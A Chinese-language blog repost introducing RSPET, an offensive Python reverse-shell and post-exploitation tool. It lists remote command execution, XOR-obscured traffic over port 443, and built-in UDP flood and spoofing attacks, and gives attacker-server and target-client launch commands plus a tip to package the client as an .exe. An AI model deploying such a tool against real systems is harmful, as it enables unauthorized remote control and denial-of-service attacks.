python渗透工具,基于 Python 的反连 Shell 和后渗透工具

RSPET (Reverse Shell and Post Exploitation Tool) 是一个基于Python的反连shell,并且具备后渗透阶段的一些功能。注意:在V0.0.3版本中添加了一个min文件夹,因为这个新版本包含了其它不影响主功能(反连shell)的其它功能

min不会引入v0.0.3之后版本的任何更多功能,只接受与bug和性能相关的补丁。

目前的版本:v0.0.6

功能

远程命令执行

流量加密(异或加密代替明文传输),使用443端口可以取得更好的效果

内置了加密传输文件或二进制数据的功能

内置UDP洪泛攻击工具

内置UDP欺骗攻击工具

管理多个或全部主机,控制多个连接的主机传输文件和UDP洪泛攻击。

模块化的代码设计,易于定制

客户端脚本已经过测试,可以兼容Pyinstaller(可以转换成.exe)

1.UDP欺骗使用了RAW_SOCKETS,所以为了正常使用,客户端需要运行在支持RAW_SOCKETS的操作系统(大部分基于Unix的系统)上,并且有root权限。最后,许多ISP在某地方做了手脚,有可能会丢弃或者修改欺骗的数据包。

2.查看EXPANDING,方便你添加新的功能,或者根据你的需要定制RSPET

3.查看primalsecurity.net的博客,了解生成.exe的方法

部署

RSPET_server.py或RSPET_server_min.py运行在攻击机上,接收连接。

RSPET_client.py或RSPET_client_min.py运行在目标机上,会初始化并发送连接请求,等待输入。

执行

服务端:

[cc lang=”php”]

python RSPET_server.py (max_connections)

[/cc]

max_connections如果为空,则默认为5.

控制端:

[cc lang=”php”]

python RSPET_client.py server_ip

[/cc]

可以根据个人需要进行调整

Linux发行版

包含RSPET的Linux发行版列表

BlackArch Linux (2016.04.28版本中)

原创文章,作者:老D,如若转载,请注明出处:https://laod.cn/tools/python-shell-penetration-tool.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值